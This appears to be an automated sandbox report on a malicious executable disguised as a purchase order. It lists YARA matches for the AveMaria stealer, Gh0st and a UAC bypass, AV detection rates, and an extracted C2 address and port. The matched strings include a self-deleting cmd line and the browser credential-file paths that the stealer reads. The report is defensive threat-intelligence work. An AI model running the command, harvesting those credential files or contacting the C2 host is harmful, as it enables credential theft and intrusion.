4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x191f0:$c1: Elevation:Administrator!new:
4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x144e8:$a1: \Opera Software\Opera Stable\Login Data 0x14810:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14158:$a3: \Google\Chrome\User Data\Default\Login Data
4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack	AveMaria_WarZone	unknown	unknown	0x16630:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1640c:$str2: MsgBox.exe 0x1669c:$str4: \System32\cmd.exe 0x162e0:$str6: Ave_Maria 0x15b78:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x14e78:$str8: SMTP Password 0x14158:$str11: \Google\Chrome\User Data\Default\Login Data 0x15b44:$str12: \sqlmap.dll 0x191f0:$str16: Elevation:Administrator!new 0x19310:$str17: /n:%temp%
4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x191f0:$c1: Elevation:Administrator!new:
4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x144e8:$a1: \Opera Software\Opera Stable\Login Data 0x14810:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14158:$a3: \Google\Chrome\User Data\Default\Login Data
4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack	AveMaria_WarZone	unknown	unknown	0x16630:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1640c:$str2: MsgBox.exe 0x1669c:$str4: \System32\cmd.exe 0x162e0:$str6: Ave_Maria 0x15b78:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x14e78:$str8: SMTP Password 0x14158:$str11: \Google\Chrome\User Data\Default\Login Data 0x15b44:$str12: \sqlmap.dll 0x191f0:$str16: Elevation:Administrator!new 0x19310:$str17: /n:%temp%
4.0.ADJUSTED PO3917NOV.exe.400000.15.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
4.0.ADJUSTED PO3917NOV.exe.400000.15.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.15.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.15.raw.unpack	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
4.0.ADJUSTED PO3917NOV.exe.400000.12.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
4.0.ADJUSTED PO3917NOV.exe.400000.12.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.12.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.12.raw.unpack	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
4.0.ADJUSTED PO3917NOV.exe.400000.10.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
4.0.ADJUSTED PO3917NOV.exe.400000.10.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.10.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.10.raw.unpack	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x191f0:$c1: Elevation:Administrator!new:
4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x144e8:$a1: \Opera Software\Opera Stable\Login Data 0x14810:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14158:$a3: \Google\Chrome\User Data\Default\Login Data
4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack	AveMaria_WarZone	unknown	unknown	0x16630:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1640c:$str2: MsgBox.exe 0x1669c:$str4: \System32\cmd.exe 0x162e0:$str6: Ave_Maria 0x15b78:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x14e78:$str8: SMTP Password 0x14158:$str11: \Google\Chrome\User Data\Default\Login Data 0x15b44:$str12: \sqlmap.dll 0x191f0:$str16: Elevation:Administrator!new 0x19310:$str17: /n:%temp%
4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x191f0:$c1: Elevation:Administrator!new:
4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x144e8:$a1: \Opera Software\Opera Stable\Login Data 0x14810:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14158:$a3: \Google\Chrome\User Data\Default\Login Data
4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack	AveMaria_WarZone	unknown	unknown	0x16630:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1640c:$str2: MsgBox.exe 0x1669c:$str4: \System32\cmd.exe 0x162e0:$str6: Ave_Maria 0x15b78:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x14e78:$str8: SMTP Password 0x14158:$str11: \Google\Chrome\User Data\Default\Login Data 0x15b44:$str12: \sqlmap.dll 0x191f0:$str16: Elevation:Administrator!new 0x19310:$str17: /n:%temp%
4.0.ADJUSTED PO3917NOV.exe.400000.18.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
4.0.ADJUSTED PO3917NOV.exe.400000.18.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.18.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.18.raw.unpack	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
4.3.ADJUSTED PO3917NOV.exe.15a0220.2.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0xb18:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
4.3.ADJUSTED PO3917NOV.exe.15a0220.2.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xb18:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xb18:$c1: Elevation:Administrator!new:
4.3.ADJUSTED PO3917NOV.exe.15a0220.2.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
4.3.ADJUSTED PO3917NOV.exe.15a17b8.4.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
4.3.ADJUSTED PO3917NOV.exe.15a17b8.4.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xd80:$c1: Elevation:Administrator!new:
4.3.ADJUSTED PO3917NOV.exe.15a17b8.4.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x17ff0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x17ff0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x17ff0:$c1: Elevation:Administrator!new:
0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x138e8:$a1: \Opera Software\Opera Stable\Login Data 0x13c10:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13558:$a3: \Google\Chrome\User Data\Default\Login Data
0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.unpack	AveMaria_WarZone	unknown	unknown	0x15a30:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1580c:$str2: MsgBox.exe 0x15a9c:$str4: \System32\cmd.exe 0x156e0:$str6: Ave_Maria 0x14f78:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x14278:$str8: SMTP Password 0x13558:$str11: \Google\Chrome\User Data\Default\Login Data 0x14f44:$str12: \sqlmap.dll 0x17ff0:$str16: Elevation:Administrator!new 0x18110:$str17: /n:%temp%
4.3.ADJUSTED PO3917NOV.exe.15a17b8.0.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
4.3.ADJUSTED PO3917NOV.exe.15a17b8.0.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xd80:$c1: Elevation:Administrator!new:
4.3.ADJUSTED PO3917NOV.exe.15a17b8.0.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x191f0:$c1: Elevation:Administrator!new:
4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x144e8:$a1: \Opera Software\Opera Stable\Login Data 0x14810:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14158:$a3: \Google\Chrome\User Data\Default\Login Data
4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack	AveMaria_WarZone	unknown	unknown	0x16630:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1640c:$str2: MsgBox.exe 0x1669c:$str4: \System32\cmd.exe 0x162e0:$str6: Ave_Maria 0x15b78:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x14e78:$str8: SMTP Password 0x14158:$str11: \Google\Chrome\User Data\Default\Login Data 0x15b44:$str12: \sqlmap.dll 0x191f0:$str16: Elevation:Administrator!new 0x19310:$str17: /n:%temp%
0.2.ADJUSTED PO3917NOV.exe.400c580.4.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xad8a0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xad8a0:$c1: Elevation:Administrator!new:
0.2.ADJUSTED PO3917NOV.exe.400c580.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0xa8b98:$a1: \Opera Software\Opera Stable\Login Data 0xa8ec0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xa8808:$a3: \Google\Chrome\User Data\Default\Login Data
0.2.ADJUSTED PO3917NOV.exe.400c580.4.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0.2.ADJUSTED PO3917NOV.exe.400c580.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ADJUSTED PO3917NOV.exe.400c580.4.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
4.2.ADJUSTED PO3917NOV.exe.400000.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
4.2.ADJUSTED PO3917NOV.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.ADJUSTED PO3917NOV.exe.400000.0.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
4.2.ADJUSTED PO3917NOV.exe.400000.0.raw.unpack	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x191f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x191f0:$c1: Elevation:Administrator!new:
4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x144e8:$a1: \Opera Software\Opera Stable\Login Data 0x14810:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14158:$a3: \Google\Chrome\User Data\Default\Login Data
4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack	AveMaria_WarZone	unknown	unknown	0x16630:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1640c:$str2: MsgBox.exe 0x1669c:$str4: \System32\cmd.exe 0x162e0:$str6: Ave_Maria 0x15b78:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x14e78:$str8: SMTP Password 0x14158:$str11: \Google\Chrome\User Data\Default\Login Data 0x15b44:$str12: \sqlmap.dll 0x191f0:$str16: Elevation:Administrator!new 0x19310:$str17: /n:%temp%
4.0.ADJUSTED PO3917NOV.exe.400000.8.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
4.0.ADJUSTED PO3917NOV.exe.400000.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.8.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.8.raw.unpack	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
0.2.ADJUSTED PO3917NOV.exe.2f1db8c.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.21.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x150e8:$a1: \Opera Software\Opera Stable\Login Data 0x15410:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14d58:$a3: \Google\Chrome\User Data\Default\Login Data
4.0.ADJUSTED PO3917NOV.exe.400000.21.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.21.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
4.0.ADJUSTED PO3917NOV.exe.400000.21.raw.unpack	AveMaria_WarZone	unknown	unknown	0x17230:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x1700c:$str2: MsgBox.exe 0x1729c:$str4: \System32\cmd.exe 0x16ee0:$str6: Ave_Maria 0x16778:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x15a78:$str8: SMTP Password 0x14d58:$str11: \Google\Chrome\User Data\Default\Login Data 0x16744:$str12: \sqlmap.dll
Click to see the 131 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.raw.unpack

Malware Configuration Extractor: AveMaria {"C2 url": "185.222.57.253", "port": 4782}

Multi AV Scanner detection for submitted file

Show sources

Source: ADJUSTED PO3917NOV.exe

ReversingLabs: Detection: 31%

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.3fccb60.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.400c580.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.327703338.00000000015C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.319379461.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.321459100.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.317402875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327531363.00000000015CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.316730524.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327638100.00000000015C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327579370.00000000015B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.327281323.00000000030A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.319952873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.318207568.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327676957.00000000015CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327479352.00000000015A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.327512166.0000000003ED9000.00000004.00000001.sdmp, type: MEMORY

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\QUQovKcaZRcNZ.exe

ReversingLabs: Detection: 28%

Source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack	Avira: Label: TR/Redcap.ghjpt
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack	Avira: Label: TR/Redcap.ghjpt
Source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack	Avira: Label: TR/Redcap.ghjpt
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack	Avira: Label: TR/Redcap.ghjpt
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack	Avira: Label: TR/Redcap.ghjpt
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack	Avira: Label: TR/Redcap.ghjpt
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack	Avira: Label: TR/Redcap.ghjpt
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack	Avira: Label: TR/Redcap.ghjpt
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack	Avira: Label: TR/Redcap.ghjpt

